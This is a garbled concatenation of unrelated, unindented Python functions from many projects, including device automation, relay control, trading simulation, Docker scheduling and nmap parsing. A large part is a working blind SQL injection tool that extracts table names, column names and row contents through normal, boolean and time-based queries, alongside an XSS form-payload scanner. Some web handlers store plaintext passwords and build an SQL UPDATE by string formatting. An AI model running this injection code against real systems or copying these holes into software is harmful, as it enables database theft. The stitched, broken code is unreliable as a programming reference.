def server(self):
for device in self.devices.get(self.device_type):
# 提取校验服务启动成功的端口
self.ports.append(device.get('port'))
logger.debug('配置参数:%s'%device)
tt = self.server_commond(kwargs=device)
def __del__(self):
"""
销毁
"""
self.conn.commit()
self.conn.close()
logger.debug('destroy database object')
def kill_server(self):
"""
adb如果重启 夜游神将不会被查到
:return:
"""
logger.debug('执行[KILL SERVER]操作:%s' %
subprocess.getoutput("taskkill /F /IM node.exe /t"))
def payloads(file, rstr, rint, level):
# declare list to save payloads
plist = list()
# check if specified file exist
if file is None:
logger.debug(
"The payload file does not specify. Loading default payloads")
logger.info("Generating payloads for level %s..." % (level))
plist = _open_file("data/basic.txt", plist, rstr, rint)
if level == 2 or level == 3:
plist = _open_file("data/body.txt", plist, rstr, rint)
plist = _open_file("data/img.txt", plist, rstr, rint)
plist = _open_file("data/div.txt", plist, rstr, rint)
if level == 3:
plist = _open_file("data/svg.txt", plist, rstr, rint)
plist = _open_file("data/polyglot.txt", plist, rstr, rint)
else:
logger.info("Generating payloads for file %s..." % (file))
plist = _open_file(file, plist, rstr, rint)
logger.info("%s payloads have been generated" % (len(plist)))
return plist
def handle(param):
ret = 0
username = param.get('username')
passwd = param.get('password')
if not username or not passwd:
return {'ret':0, 'date': {'desc':'input error'}}
#if not re.search(u'^[_a-zA-Z0-9\u4e00-\u9fa5]+$', username):
# return {'ret':0, 'data': {'desc':'username is has (!,@,#,$,%...)'}}
if not re.match(r"^1[35678]\d{9}$", username):
return {'ret':0, 'data': {'desc':'username is not phonenum'}}
tmp = userstruct.read_mysql(username)
logger.debug(tmp)
if tmp:
return {'ret':0, 'data': {'desc':'username is exist'}}
if len(passwd) < 6:
return {'ret':0, 'data': {'desc':'passwd less 6'}}
ret = sqlutil.InsertIntoDB('userinfo', {'username': username, 'password': passwd, 'salt':'11'})
if not ret:
return {'ret':0, 'data': {'desc':'InsertIntoDB error'}}
return {'ret':1, 'data': {'desc':'ok'}}
def __accept(self, sock: socket):
conn, addr = sock.accept()
logger.debug('accepted: {0}, from: {1}'.format(conn, addr))
conn.setblocking(False)
self.__selector.register(conn, EVENT_READ)
self.__connections[conn] = self.Connection(time.time())
self.__connected(conn)
def handle(param):
ret = 0
userid = param.get('userid')
skey = param.get('skey')
oldpwd = param.get('oldpwd')
newpwd = param.get('newpwd')
logger.info("%s,%s", userid, skey)
if userid and skey and oldpwd:
tmp = userstruct.read_redis(userid)
if not tmp or tmp.skey != skey:
return {'ret': 0, 'data': {'des': 'skey error'}}
if tmp.password != oldpwd:
return {'ret': 0, 'data': {'des': 'oldpwd error'}}
if not userstruct.checkpwdfrt(newpwd):
return {'ret': 0, 'data': {'des': 'newpwd format error'}}
#skey = md5('%s%s%s' % (tmp.username, time.ctime(), random.random()))
#tmp.skey = skey
#userstruct.write_redis_dict(userid, {'skey':skey})
sqlutil.execsqlcommit(
"UPDATE userinfo SET `password` = '%s' where userid = %s" %
(newpwd, userid))
logger.debug(tmp)
return {'ret': 1, 'data': tmp.todict()}
return {'ret': 0, 'data': {}}
def _do_basic_attack(self, method):
logger.info("Finding forms in the page..")
forms = self.get_inputs()
# check if exist forms
if len(forms) == 0:
logger.warn("There aren't forms to check.")
logger.warn("Please, add more info to find anything.")
return
logger.info("Detected %s forms." % (len(forms)))
try:
# scan each form
for f in forms:
logger.info("Checking XSS on form...")
data = self.get_form_data(f)
inputs = data['inputs']
if not inputs:
logger.warn("The form has no fields to check")
continue
self._wrapUrl.kwargs[method] = data['inputs']
self._send_payload(inputs, method)
except Exception as e:
logger.debug(e)
def new_request(wrapUrl, timeout=None):
# create dict to save request data
kwargs = dict(wrapUrl.kwargs)
method = kwargs['method']
# check if exist timeout, else use default value
if timeout is not None:
kwargs['timeout'] = timeout
else:
kwargs['timeout'] = DEFAULT_TIMEOUT
kwargs = define_request(wrapUrl._url, **kwargs)
try:
session = requests.Session()
request = session.request(method, wrapUrl._url, **kwargs)
except Exception as e:
logger.debug(e)
finally:
if request is not None:
if request.status_code != 200:
logger.error("%s (%s)" % (request.reason, request.status_code))
else:
return request
def update(self, *args, **kwargs):
logger.debug("{0:.3f} kW ({1:.2f}s)".format(args[0], args[1]))
if self.is_started():
self.next(args[0], args[1])
else:
# TODO: Find a better solution
self.start()
def open(self):
LogSocketHandler.waiters.add(self)
logger.debug("WebSocket opened")
self.write_message(
json_encode({
'COMMAND': network_api.COM_RELAY,
'STATUS': network_api.STA_RELOAD,
'DATA': server.get_relays()
}))
def get_node(self, name):
if name in self.nodes:
return self.nodes[name]
L.debug("Connecting to remote manager node %s"%name)
self.async = True
node = Node(name)
self.nodes[name] = node
if not node.exists: return node
return node
def close_browser(browser):
try:
# close browser
logger.info("Closing browser...")
browser.quit()
except Exception as e:
logger.debug("Error to close browser")
logger.debug(e)
pass
def getMothMountPath(self):
command = getMothMountPathCommand.format(self.device_path)
mount_path, success = output_shell(command)
self.mount_path = mount_path[:-1] if (
success and len(mount_path) > 3) else None
logger.debug("getMothMountPath:{0}".format(self.mount_path))
return self.mount_path
def open_order(self,
day,
type: str,
asset: Asset,
coins,
price,
stop_loss=0.01):
session = self.createSession()
# Create an order instance
o = Order(
symbol=asset.symbol,
type=type,
status=OrderStatus.OPEN,
coins=coins,
open_price=price,
#close_price=None,
last_price=price,
stop_loss=price + (price * stop_loss) if stop_loss else None,
open_at=day,
#closed_at=None,
)
log = OrderLog(symbol=asset.symbol,
type=o.type,
status=o.status,
price=price,
timestamp=day)
# Fail if order can't be placed
if not self.can_open_order(asset, o):
logger.debug("[Day {}] Cannot open order for {}".format(
day, asset.symbol))
return None
if o.type == OrderType.LONG:
# Deduct order from allowance, which is in fiat for margin longs
asset.long_allowance -= o.open_price * o.coins
# In margin long orders we purchase coins using FIAT lent from our broker (so subject to allowance)
asset.margin_coins += o.coins
# Increase long orders count
asset.long_orders += 1
elif o.type == OrderType.SHORT:
# Deduct order from allowance, which is in coin for margin short
asset.short_allowance -= o.coins
# In margin short orders we sell coins lent from our broker (subject to allowance) at open price
asset.margin_fiat += o.coins * o.open_price
# Increase short orders count
asset.short_orders += 1
elif o.type == OrderType.SPOT:
# Deduct order buy price + fee from FIAT wallet
asset.fiat -= o.open_price * o.coins + self.get_open_fee(o)
# Add purchased coins to balance
asset.coins += o.coins
# Increase spot orders count
asset.spot_orders += 1
session.add(o)
session.add(log)
session.commit()
return o, log
def discover(cls):
if cls.registered_modules:
return
cls.registered_modules = {
name: importlib.import_module(name)
for finder, name, ispkg in pkgutil.iter_modules(
__path__, __name__ + ".")
}
logger.debug("Available models: {}".format(
cls.registered_modules.keys()))
def cleanup_dead(self, name=None, id=None):
self.refresh_status()
for id, c in self.containers.items():
c = self.containers[id]
if c['Running']: continue
if name or id:
if (id and id!=c['Id']) or (name and name not in c['Names']):
continue
self.client.remove_container(c['Id'], force=True)
L.debug("Cleaned up dead container %s"%(c['Name'] or c['Id']))
def resetMoth(self):
print("AudioMoth restarting")
# Pulling the RST pin to ground forces the AudioMoth to restart
self.rst.outputMode()
self.rst.low()
time.sleep(1)
# Close the pin to allow RST to complete
self.rst.close()
logger.debug("resetMoth")
def __init__(self, kilo_watt, switch_on, switch_off, gpio_pin,
relay_number):
self.__kilo_watt = kilo_watt
self.__switch_on = switch_on
self.__switch_off = switch_off
self.__gpio_pin = gpio_pin
self.__relay_number = relay_number
if self.__relay_number:
logger.debug("Setup Relay {0}".format(self.__relay_number))
def server_command(self, **kwargs):
command = 'appium -a {ip} -p {port} -U {udid} -g {log}'.format(
ip=kwargs.get('ip'),
port=kwargs.get('port'),
udid=kwargs.get('udid'),
log=kwargs.get('log_path'))
logger.debug('启动服务执行的命令:%s' % command)
subprocess.Popen(command,
stdout=open(kwargs.get('log_path'), 'a+'),
stderr=subprocess.PIPE,
shell=True)
def getMothDeviceName(self):
moth_device_name, success = output_shell(getMothDeviceNameCommand)
self.device_name = moth_device_name[:-1] if (
success and len(moth_device_name) > 3) else None
self.device_path = path_to_watch + '/' + moth_device_name[:-1] if (
success and len(moth_device_name) > 3) else None
logger.debug("getMothDeviceName:{0}".format(self.device_name))
return self.device_name
def is_mounted(self):
self.getMothMountPath()
mounted = self.mount_path is not None and len(self.mount_path) > 3
if mounted:
print("AudioMoth device mounted at {0}".format(self.mount_path))
else:
print("m", end='', flush=True)
logger.debug("is_mounted:{0}".format(mounted))
return mounted
def __prev_state(self):
timestamp = time.perf_counter()
if not self.__relay_switch_to == _OFF or self.__switch_timestamp == 0.0:
self.__relay_switch_to = _OFF
self.__switch_timestamp = timestamp
elif timestamp - self.__switch_timestamp > self.__switch_off:
GPIO.output(self.__gpio_pin, False)
self.__relay_switch_is = _OFF
return self.__return_state(self.prev)
logger.debug("count = {0:>5.2f}, switch = {1:>5.2f}".format(
timestamp - self.__switch_timestamp, self.__switch_off))
return self
def __next_state(self):
timestamp = time.perf_counter()
if not self.__relay_switch_to == _ON or self.__switch_timestamp == 0.0:
self.__relay_switch_to = _ON
self.__switch_timestamp = timestamp
elif timestamp - self.__switch_timestamp > self.__switch_on:
GPIO.output(self.__gpio_pin, True)
self.__relay_switch_is = _ON
return self.__return_state(self.next)
logger.debug("count = {0:>5.2f}, switch = {1:>5.2f}".format(
timestamp - self.__switch_timestamp, self.__switch_on))
return self
def is_detected(self):
self.getMothDeviceName()
detected = self.device_name is not None and len(self.device_name) > 3
if detected:
print(
f"AudioMoth device {self.device_name} detected at {self.device_path}"
)
logger.debug(f"is_detected: {self.device_name} {self.device_path}")
else:
print("d", end='', flush=True)
logger.debug(f"is_detected:-".format(detected))
return detected
def dump(self, username: str, include_root: bool, page_limit: int = 0):
_followings = self.__fetch_followings_all(username)
if include_root:
_followings = [username] + _followings
logger.debug(_followings)
for self._following in _followings:
logger.info(f"fetching following user: {self._following}")
try:
self.__fetch_stars_all(self._following, page_limit)
logger.debug('saving changes to database')
self.session.commit()
except RuntimeError as e:
logger.critical(str(e))
break
def __fetch_followings_all(self, username):
_followings = []
_page = 1
while True:
logger.debug(f"fetching following users: page {_page}")
_followings_page = self.__fetch_followings_by_page(username,
page=_page)
if not _followings_page:
break
_followings += [
_following['login'] for _following in _followings_page
]
_page += 1
return _followings
def test_sever(self):
# 通过命令 一遍一遍的查找 如果有返回值则代表成功启动 没有返回值代表启动失败
#netstat - ano | findstr 4723
while True:
s = subprocess.getoutput('netstat -ano | findstr %s' %
self.ports[0])
if s:
logger.debug('端口:【%s】 启动成功' % self.ports[0])
break
else:
logger.debug('端口:【%s】 启动失败 5秒后重试' % self.ports[0])
time.sleep(5)
return True
def get_inputs(self, input_type="form"):
try:
request = get_forms_request(self._wrapUrl)
#request = requests.get(self._wrapUrl._url)
except Exception as e:
logger.debug(e)
pass
bs = BeautifulSoup(request.content, "html.parser")
inputs = []
# add inputs
for i in bs.find_all(input_type):
inputs.append(i)
return inputs
def read_shapefiles(paths, param):
logger.info("Start")
scope_shp = gpd.read_file(
paths["subregions"]) # Import shapefile of regions
scope_shp = scope_shp.to_crs(
epsg=4326) # In case it is not already in this format
param["spatial_scope"] = sf.define_spatial_scope(scope_shp)
param["Crd_all"] = sf.crd_merra(
param["spatial_scope"], param["res_weather"]) # rectangle coordinates
param = read_regions(param, scope_shp)
param = read_EEZ(paths, param, scope_shp)
logger.debug("End")
return param
def test(self, output=1):
# global conf
if self.sqlirequest == "GET":
payload = self.dealpayload.construct_request(self.payload)
r = self.Data.GetData(payload)
elif self.sqlirequest == "POST":
payload = self.dealpayload.construct_request(self.payload)
r = self.Data.PostData(payload)
else:
logger.error("self.sqlirequest error...")
exit(0)
if self.len == 0:
logger.debug("Set the parameters of the self.len...")
self.len = len(r)
if output == 1:
print r
def download_translation(self, archive, timestamp, suite, component):
"""
Download repository Translation files
"""
translation_files = [
f"/archive/{archive}/{timestamp}/dists/{suite}/{component}/i18n/Translation-en.bz2"
]
for f in translation_files:
localfile = self.localdir + f
remotefile = f"{SNAPSHOT_DEBIAN}{f}"
logger.debug(remotefile)
if not url_exists(remotefile):
logger.error(f"Cannot find {remotefile}")
continue
if os.path.exists(localfile):
continue
self.download(localfile, remotefile)
def schedule(self, nodes):
number = 0
running = len(self.running(nodes))
schedule = self.cfg.get('schedule', 'spread')
scaling = self.cfg.get('scaling', 'swarm')
desired = self.cfg.get('desired', 1)
leader_ip = '127.0.0.1'
iternodes = []
if schedule == 'one_per_node':
iternodes = [(k,v) for (k,v) in nodes.items()
if not self.name in v.running_services]
elif schedule == 'spread':
needed = desired - running
L.debug("Swarm Scheduling: %s, desired=%d, running=%d"%(self.name,
desired,
running))
if needed:
iternodes = [nodes.items()[n%len(nodes)] for n in range(needed)]
schedules=[]
for name, node in iternodes:
if scaling == 'raft':
if running+number == 0:
role = 'leader'
leader_ip = node.ip
else:
role = 'member'
else:
role = 'member'
cfg = deepcopy(self.cfg)
if 'roles' in cfg and role in cfg['roles']:
cfg.update(cfg['roles'][role])
cfg.update( {
'ip': node.ip,
'leader_ip': leader_ip,
'node': name,
'role': role,
'number': number,
'service': self.name,
'domain': self.manager.cfg.get('domain',
'%(manager_name)s.srvr.dj')%cfg,
})
schedules.append([node, cfg])
number = number+1
return schedules
def do(self):
#gmail=Gamil('*****@*****.**', 'password' )
#gmail.send("*****@*****.**" ,"MONI Alert" ,"%s missing"%vmid)
do()
logger.debug('doing')
def get_tables(self):
# 若databases_name未设置,就跑一下
if len(self.databases_name) == 0:
logger.debug("Set the parameters of the self.databases_name...")
SqliDatabases.get_database(self)
# 每个databases_name需要跑一次tables_name
for database_name in self.databases_name:
# 开始跑database_name
logger.debug("Start sqli databases %s's tables_name" % database_name)
tables_name = []
logger.debug("The sqlirequest is %s, start sqli tables..." % self.sqlirequest)
if self.sqlimethod == "normal":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table amount sqli...")
# 先注tables的数量
tables_number = normal_injection(select='COUNT(*)',
source="information_schema.tables",
conditions="table_schema = '" + database_name + "'",
dealpayload=self.dealpayload,
data=self.Data, isCount=True, sqlirequest=self.sqlirequest
)
logger.debug("Table account sqli success...The tables_number is %d..." % tables_number)
print "[*] tables_number: %d" % tables_number
# 每个循环跑一次tables的数据
for i in trange(int(tables_number), desc="Table sqli...", leave=False, disable=True):
# 首先是tablename的长度
logger.debug("Start %dth table length sqli..." % (i + 1))
table_name_len = normal_injection(select='length(`table_name`)',
source="information_schema.tables",
conditions="table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data, isCount=True, sqlirequest=self.sqlirequest
)
logger.debug("%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len))
logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len))
# 然后注tablename
logger.debug("Start %dth table name sqli..." % (i + 1))
table_name = normal_injection(select='`table_name`',
source='information_schema.tables',
conditions="table_schema = '" + database_name + "'", limit=i,
dealpayload=self.dealpayload,
data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
)
logger.debug("%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name))
# 把table_name插入列表
tables_name.append(table_name)
logger.info("[*] %dth table_name: %s" % ((i + 1), table_name))
elif self.sqlimethod == "build":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table amount sqli...")
retVal = build_injection(select="COUNT(`table_name`)",
source="information_schema.tables",
conditions="table_schema = '" + database_name + "'",
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isCount=True, sqlirequest=self.sqlirequest)
tables_number = int(retVal)
logger.debug("Tables amount sqli success...The tables_number is %d..." % tables_number)
logger.info("[*] tables_number: %d" % tables_number)
for i in range(0, int(tables_number)):
# 然后注tables_name 的 length
logger.debug("Start %dth table length sqli..." % (i + 1))
retVal = build_injection(select="length(`table_name`)",
source="information_schema.tables",
conditions="table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isCount=True, sqlirequest=self.sqlirequest)
table_name_len = int(retVal)
logger.debug("%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len))
logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len))
# 然后注tables名字
# 清空table_name
table_name = ""
logger.debug("Start %dth table sqli..." % (i + 1))
for j in trange(int(table_name_len), desc='%dth Table sqli' % (i + 1), leave=False):
retVal = build_injection(select="ascii(substring(`table_name`," + repr(j + 1) + ",1))",
source="information_schema.tables",
conditions="table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isStrings=True, sqlirequest=self.sqlirequest)
table_name += chr(retVal)
logger.debug("%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name))
# 把table_name插入列表
tables_name.append(table_name)
logger.info("[*] %dth table_name: %s" % ((i + 1), table_name))
elif self.sqlimethod == "time":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table amount sqli...")
retVal = time_injection(select="COUNT(`table_name`)",
source="information_schema.tables",
conditions="table_schema = '" + database_name + "'",
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isCount=True, sqlirequest=self.sqlirequest)
tables_number = int(retVal)
logger.debug("Tables amount sqli success...The tables_number is %d..." % tables_number)
logger.info("[*] tables_number: %d" % tables_number)
for i in range(0, int(tables_number)):
# 然后注tables_number 的length
logger.debug("Start %dth table length sqli..." % (i + 1))
retVal = time_injection(select="length(`table_name`)",
source="information_schema.tables",
conditions="table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isCount=True, sqlirequest=self.sqlirequest)
table_name_len = int(retVal)
logger.debug("%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len))
logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len))
# 然后注tables名字
# 清空table_name
table_name = ""
logger.debug("Start %dth table sqli..." % (i + 1))
for j in trange(int(table_name_len), desc='%dth Table sqli' % (i + 1), leave=False):
retVal = time_injection(select="ascii(substring(`table_name`," + repr(j + 1) + ",1))",
source="information_schema.tables",
conditions="table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isStrings=True, sqlirequest=self.sqlirequest)
table_name += chr(retVal)
logger.debug("%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name))
# 把tables_name插入列表
tables_name.append(table_name)
logger.info("[*] %dth table_name: %s" % ((i + 1), table_name))
self.tables_name[database_name] = tuple(tables_name)
print "[*] tables_name list: ", self.tables_name
# iterate through xml(s)
for xml_report in nmap_xml_reports:
try:
# trying to load xml file
nmap_report = NmapParser.parse_fromfile(xml_report)
logger.info("%s host(s) loaded from %s" % (len(nmap_report.hosts), xml_report))
except Exception, e:
logger.warn("XML file %s corrupted or format not recognized" % xml_report)
# keep looking for others xml
continue
# start a cumulative dictionary
results = nmap_combine(nmap_report, results)
#print "results: %s" % len(results)
logger.info("Wraping up results")
for ip_address in results:
# colecting info for each field
open_ports = check_ports(results[ip_address]['Port/Protocol'])
hostnames = list_to_str(results[ip_address]['Domains'])
notes = results[ip_address]['Notes']
os, os_version = fingerprint_decision(results[ip_address]['Operating System'], results[ip_address]['Port/Protocol'])
#print ip_address, results[ip_address]['Operating System']
# write down to the final report file
writer.writerow({'IP Address': ip_address, 'Port/Protocol': open_ports, 'Domains': hostnames, 'Operating System': os, 'OS Version': os_version, 'Notes': notes})
logger.debug("%s,%s,%s,%s,%s,%s" % (ip_address, open_ports, hostnames, os, os_version, notes))
logger.info("Done: %s" % csv_filename)
sys.exit(0)
def play_by_schedule(self, node, schedule):
s = schedule
ip = s['ip']
name = s['node']
role = s.get('role', None)
number = s.get('number', None)
s['leader_ip'] = self.leader_ip
s['container_name'] = container_name = s.get('container_name',
'%(service)s.%(node)s.%(domain)s')%(s)
labels = {'service': s['service']}
labels.update(s.get('labels',{}))
ports = map(str, s.get('ports', []))
dynamic = map(str, s.get('dynamic_ports', []))
expose = []
bind = {}
for p in ports:
if '/' in p:
p, proto = p.split('/')
else: proto = 'tcp'
if ':' in p:
h_p, c_p = map(int, p.split(':'))
else:
h_p = c_p = int(p)
if proto in ['tcp', 'both']:
expose.append(c_p)
bind[c_p] = (node.ip, h_p)
if proto in ['udp', 'both']:
expose.append( (c_p, 'udp') )
bind['%s/udp'%c_p] = (node.ip, h_p)
L.info('Opening static port on %s:%s to %s'%(node.ip, h_p, c_p))
for p in dynamic:
if '/' in p:
p, proto = p.split('/')
else: proto = 'tcp'
c_p = int(p)
if proto in ['tcp', 'both']:
expose.append(c_p)
bind[c_p] = (node.ip, )
if proto in ['udp', 'both']:
expose.append( (c_p, 'udp') )
bind['%s/udp'%c_p] = (node.ip, )
L.info('Opening dynamic port on %s to %s'%(node.ip, c_p))
node.cleanup_dead(name=container_name)
if not node.is_running(name=container_name):
build = s.get('build', None)
image = build and s.get('service', '') or s.get('image', None)
instance = node.run(
name=container_name, hostname=container_name,
image=image, build=build, ports=expose,
command=s.get('command', '')%s,
environment=[e%s for e in s.get('environment', [])],
labels=labels,
host_config = node.client.create_host_config(
binds=s.get('volumes', None),
port_bindings=bind,
dns=[self.leader_ip],
dns_search=[self.cfg.get('domain', None)],
network_mode=s.get('network', None),
)
)
else:
L.debug("Already running %s"%(container_name))
def get_content(self, result, database_name, table_name, column_name, limits):
# 开始注内容
content_len = 0
logger.debug("Start sqli table %s column %s limit %d content..." % (table_name, column_name, limits))
logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest)
if self.sqlimethod == "normal":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
# 注这一条的数据长度
logger.debug("Start %dth content length sqli..." % (limits + 1))
content_len = normal_injection(select="length(`" + column_name + "`)",
source=database_name + "." + table_name,
limit=limits,
dealpayload=self.dealpayload,
data=self.Data, isCount=True,
sqlirequest=self.sqlirequest
)
logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len))
logger.info("[*] content_len: %d" % content_len)
# 然后注content
logger.debug("Start %dth content sqli..." % (limits + 1))
content = normal_injection(select="`" + column_name + "`",
source=database_name + "." + table_name,
limit=limits,
dealpayload=self.dealpayload,
data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
)
logger.debug("Content sqli success...The content is %s..." % content)
# 把content return回去,以元组的形式
contents = [column_name, content]
logger.info("[*] content: %s" % content)
result.put(tuple(contents))
elif self.sqlimethod == "build":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
# 然后注content 的 length
retVal = build_injection(select="length(`" + column_name + "`)",
source=database_name + "." + table_name,
limit=limits,
dealpayload=self.dealpayload, data=self.Data,
lens=self.len,
isCount=True, sqlirequest=self.sqlirequest)
content_len = int(retVal)
logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len))
logger.info("[*] content_len: %d" % content_len)
# 然后注content名字
# 清空column_name
content = ""
logger.debug("Start %dth content sqli..." % (limits + 1))
for j in trange(int(content_len), desc='%dth Content sqli' % (limits + 1), leave=False):
retVal = build_injection(select="ascii(substring(`" + column_name + "`," + repr(j + 1) + ",1))",
source=database_name + "." + table_name,
limit=limits,
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isStrings=True, sqlirequest=self.sqlirequest)
content += chr(retVal)
logger.debug("Content sqli success...The content is %s..." % content)
# 把content return回去,以元组的形式
contents = [column_name, content]
logger.info("[*] content: %s" % content)
result.put(tuple(contents))
elif self.sqlimethod == "time":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
# 然后注content 的length
retVal = time_injection(select="length(`" + column_name + "`)",
source=database_name + "." + table_name,
limit=limits,
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isCount=True, sqlirequest=self.sqlirequest)
content_len = int(retVal)
logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len))
logger.info("[*] content_len: %d" % content_len)
# 然后注content名字
# 清空column_name
content = ""
logger.debug("Start %dth content sqli..." % (limits + 1))
for j in trange(int(content_len), desc='%dth Database sqli' % (limits + 1), leave=False):
retVal = time_injection(select="ascii(substring(`" + column_name + "`," + repr(j + 1) + ",1))",
source=database_name + "." + table_name,
limit=limits,
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isStrings=True, sqlirequest=self.sqlirequest)
content += chr(retVal)
logger.debug("Content sqli success...The content is %s..." % content)
# 把content return回去,以元组的形式
contents = [column_name, content]
logger.info("[*] content: %s" % content)
result.put(tuple(contents))
logger.debug("Sqli table %s column %s limit %d success..." % (table_name, column_name, limits))
def get_content_count(self, database_name, table_name):
# 开始注内容
logger.debug("Start sqli table %s content amount..." % table_name)
logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest)
if self.sqlimethod == "normal":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table's %s content amount sqli..." % table_name)
# 注数据的数量
content_count = normal_injection(select="count(*)",
source=database_name + "." + table_name,
dealpayload=self.dealpayload,
data=self.Data, isCount=True, sqlirequest=self.sqlirequest
)
logger.debug("Content account sqli success...The count is %d..." % content_count)
# 把content account return回去
logger.info("[*] content count: %d" % content_count)
return content_count
elif self.sqlimethod == "build":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table's %s content amount sqli..." % table_name)
retVal = build_injection(select="count(*)",
source=database_name + "." + table_name,
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isCount=True, sqlirequest=self.sqlirequest)
content_count = int(retVal)
logger.debug("Content account sqli success...The content_count is %d..." % content_count)
logger.info("[*] content_count: %d" % content_count)
# 把content account return回去
logger.info("[*] content count: %d" % content_count)
return content_count
elif self.sqlimethod == "time":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table's %s content amount sqli..." % table_name)
retVal = time_injection(select="count(*)",
source=database_name + "." + table_name,
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isCount=True, sqlirequest=self.sqlirequest)
content_count = int(retVal)
logger.debug("Content account sqli success...The content_count is %d..." % content_count)
logger.info("[*] content_count: %d" % content_count)
# 把content account return回去
logger.info("[*] content count: %d" % content_count)
return content_count
def run_content(self):
if len(self.columns_name) == 0:
SqliColumns.get_columns(self)
# 循环解包,进入注入
for database_name in self.columns_name:
for table_name in self.columns_name[database_name]:
# 获取数据的条数,如果小于设置的self.content_count,那需要设置条数等于self.content_count
content_counts = self.get_content_count(database_name, table_name)
if content_counts == 0:
logger.warning('Database %s Table %s is empty...' % (database_name, table_name))
continue
elif content_counts != self.content_count:
logger.debug('Database %s Table %s content amount change to %d' % (database_name, table_name, content_counts))
self.content_count = content_counts
else:
pass
# 声明一个表储存数据
content = PrettyTable(list(self.columns_name[database_name][table_name]))
content.padding_width = 1
content.align = "r"
# 每个表都要注入指定条数那么多次
for limits in xrange(self.content_count):
# 声明一个队列,储存返回的值
result = Queue.Queue()
# 声明线程队列、结果队列和最终插入table的数据队列
threads = []
results = []
contents = []
# 开始多线程的注入
logger.debug("Start multithreading Sqli...")
for column_name in self.columns_name[database_name][table_name]:
# 开始一个线程注入一个字段
try:
t = threading.Thread(target=self.get_content, name='thread for %s' % column_name,
args=(result, database_name, table_name, column_name, limits))
t.start()
except:
logger.error('Thread error...')
threads.append(t)
# 等待所有线程结束
for t in threads:
t.join()
# 注入处理返回数据,插入content中的一条
while not result.empty():
results.append(result.get())
# 处理返回的数据
for i in list(self.columns_name[database_name][table_name]):
for item in results:
if item[0] == i:
contents.append(item[1])
else:
continue
# 插入数据
content_str = ','.join(contents)
logger.info("Sqli success content is %s" % content_str)
content.add_row(contents)
# 输出表
logger.debug("Database %s Table %s sqli success..." % (database_name, table_name))
print "[*] Database %s Table %s content:" % (database_name, table_name)
print content
def main():
logger.debug("Begin Scanner...")
oparser()
def get_columns(self):
# 若tables_name未设置,则全跑一遍
if len(self.tables_name) == 0:
SqliTables.get_tables(self)
# 首先是每个database_name
for database_name in self.tables_name:
# 每个databases_name声明为一个字典
self.columns_name[database_name]={}
# 每个table_name需要跑一次columns_name
for table_name in self.tables_name[database_name]:
# 每个table_name中的columns_name声明为一个列表储存
columns_name = []
# 开始跑columns_name
logger.debug("Start sqli databases %s's tables %s's columns..." % (database_name, table_name))
logger.debug("The sqlirequest is %s, start sqli columns..." % self.sqlirequest)
if self.sqlimethod == "normal":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table's %s column amount sqli..." % table_name)
# 先注columns的数量
columns_number = normal_injection(select='COUNT(*)',
source="information_schema.columns",
conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
dealpayload=self.dealpayload,
data=self.Data, isCount=True, sqlirequest=self.sqlirequest
)
logger.debug("Columns account sqli success...The columns_number is %d..." % columns_number)
logger.info("[*] columns_number: %d" % columns_number)
# 每个循环跑一次columns的数据
for i in trange(int(columns_number), desc="Column sqli...", leave=False, disable=True):
# 首先是column name的长度
logger.debug("Start %dth column length sqli..." % (i + 1))
column_name_len = normal_injection(select='length(`column_name`)',
source="information_schema.columns",
conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data, isCount=True, sqlirequest=self.sqlirequest
)
logger.debug("%dth Column name length sqli success...The column_name_len is %d..." % ((i + 1), column_name_len))
logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len))
# 然后注columns name
column_name = normal_injection(select='`column_name`',
source='information_schema.columns',
conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
)
logger.debug("%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name))
# 把columns_name插入列表
columns_name.append(column_name)
logger.info("[*] %dth column_name: %s" % ((i + 1), column_name))
elif self.sqlimethod == "build":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
